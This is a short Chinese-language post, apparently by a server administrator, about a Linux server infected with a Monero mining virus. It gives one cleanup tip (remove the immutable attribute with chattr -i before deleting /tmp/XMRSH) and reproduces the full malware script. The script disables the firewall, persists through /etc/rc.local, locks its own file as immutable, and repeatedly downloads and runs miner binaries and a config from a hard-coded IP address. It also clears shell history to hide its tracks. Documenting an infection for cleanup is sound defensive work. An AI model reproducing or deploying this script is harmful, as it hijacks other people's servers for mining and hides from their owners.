linux服务器中了挖矿病毒了,其脚步内容如下,按照脚本内容涉及进行清理。其中XMRSH需要先用chattr -i /tmp/XMRSH修改属性,否则删除不掉。
#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
# by:Tyrant
# 2015-02-12
service iptables stop > /dev/null 2>&1 &
mv /usr/bin/scet /usr/bin/wget
mv /usr/bin/cuy /usr/bin/curl
mv /usr/bin/Tyrant /usr/bin/wget
mv /usr/bin/Tyrantc /usr/bin/curl
if [ "sh /tmp/XMRSH &" = "$(cat /etc/rc.local | grep /tmp/XMRSH | grep -v grep)" ]; then
echo ""
else
echo "sh /tmp/XMRSH &" >> /etc/rc.local
echo "nohup /tmp/xmrminer > /dev/null 2>&1 &" >> /etc/rc.local
echo "nohup /tmp/zlkjsdn > /dev/null 2>&1 &" >> /etc/rc.local
fi
chattr +i /tmp/XMRSH
while [ 1 ]; do
Centos_sshd_killn=$(ps aux | grep "/tmp/zlkjsdn" | grep -v grep | wc -l)
if [[ $Centos_sshd_killn -eq 0 ]]; then
if [ ! -f "/tmp/zlkjsdn" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
./wget -O /tmp/zlkjsdn http://118.184.61.208:22/xmr/zlkjsdn &> /dev/null
./wget -O /tmp/config.json http://118.184.61.208:22/xmr/config.json &> /dev/null
curl -o /tmp/zlkjsdn http://118.184.61.208:22/xmr/zlkjsdn
curl -o /tmp/config.json http://118.184.61.208:22/xmr/config.json
rm wget -rf
else
echo "No wget"
fi
fi
chmod +x /tmp/zlkjsdn
chmod +x /tmp/config.json
nohup /tmp/zlkjsdn > /dev/null 2>&1 &
history -c
elif [[ $Centos_sshd_killn -gt 1 ]]; then
for killed in $(ps aux | grep "zlkjsdn" | grep -v grep | awk '{print $2}'); do
Centos_sshd_killn=$(($Centos_sshd_killn-1))
if [[ $Centos_sshd_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
Centos_ssh_killn=$(ps aux | grep "/tmp/xmrminer" | grep -v grep | wc -l)
if [[ $Centos_ssh_killn -eq 0 ]]; then
if [ ! -f "/tmp/xmrminer" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
./wget -O /tmp/xmrminer http://118.184.61.208:22/xmr/xmrminer &> /dev/null
curl -o /tmp/xmrminer http://118.184.61.208:22/xmr/xmrminer
rm wget -rf
else
echo "No wget"
fi
fi
chmod +x /tmp/xmrminer
/tmp/xmrminer &
history -c
elif [[ $Centos_ssh_killn -gt 1 ]]; then
for killed in $(ps aux | grep "xmrminer" | grep -v grep | awk '{print $2}'); do
Centos_ssh_killn=$(($Centos_ssh_killn-1))
if [[ $Centos_ssh_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
sleep 600
done